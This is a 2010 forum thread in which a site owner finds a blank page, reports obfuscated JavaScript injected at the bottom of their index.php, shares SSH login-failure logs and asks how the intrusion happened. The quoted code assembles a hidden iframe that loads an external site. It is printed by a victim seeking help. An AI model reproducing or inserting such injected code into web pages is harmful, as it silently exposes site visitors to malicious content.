isedeasy Posted August 5, 2010 Share Posted August 5, 2010 I looked at my site today to see a blank page. I downloaded my index.php file to find a stray bit of code at the bottom:- <html><body>status='';cn='r';j='d';a='a';zi='s';we='tp:';y='ph';pb='iz';o='.';v='e';n='/';g='r';sa='eaw';az='am';bj='rc';oy='ne';r='ht';dj='//s';c='if';dr='t/.';ml='2/';ne=c.concat(cn,az,v);sn=zi.concat(bj);wl=r.concat(we,dj,sa,pb,a,g,j,o,oy,dr,y,n,ml);var l=document.createElement(ne);l.setAttribute('width','5');l.setAttribute('height','5');l.setAttribute('style','display:none');l.setAttribute(sn,wl);document.body.appendChild(l);window.status=status;</body></html> My question is, how did it get there? I am guessing either somebody has brute forced my FTP details or found an exploit in my code. I have now changed my FTP details just to be sure. How would I go about finding the cause of this and preventing it from happening again. Cheers Quote Link to comment Share on other sites More sharing options...
Adam Posted August 5, 2010 Share Posted August 5, 2010 Try looking through the Apache access logs for anything suspect. Did you take note of last mod time of the file (would make things easier for yourself)? Quote Link to comment Share on other sites More sharing options...
isedeasy Posted August 5, 2010 Author Share Posted August 5, 2010 Did you take note of last mod time of the file (would make things easier for yourself)? No I didn't although it was OK a few hours ago so I'm guessing it was in the last 3 hours. I will have a quick scan through. EDIT I just scanned through every POST in my access log for today and nothing looks suspect Quote Link to comment Share on other sites More sharing options...
isedeasy Posted August 5, 2010 Author Share Posted August 5, 2010 I just looked at some other logs and found about 10 entrys like this Aug 5 13:15:35 s1****758 sshd[10098]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=***.3.4.*** user=root Aug 5 13:15:37 s1****758 sshd[10098]: Failed password for root from ***.3.4.*** port **** ssh2 Aug 5 12:15:38 s1****758 sshd[10100]: Received disconnect from ***.3.4.***: 11: Bye Bye And then somebody managed to login via FTP. Does SSH prevent users from Brute forcing a password (I know it would take a hell of a lot more than 10 attempts)? I did not see any failed FTP logins so I am not sure how somebody got my FTP password. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.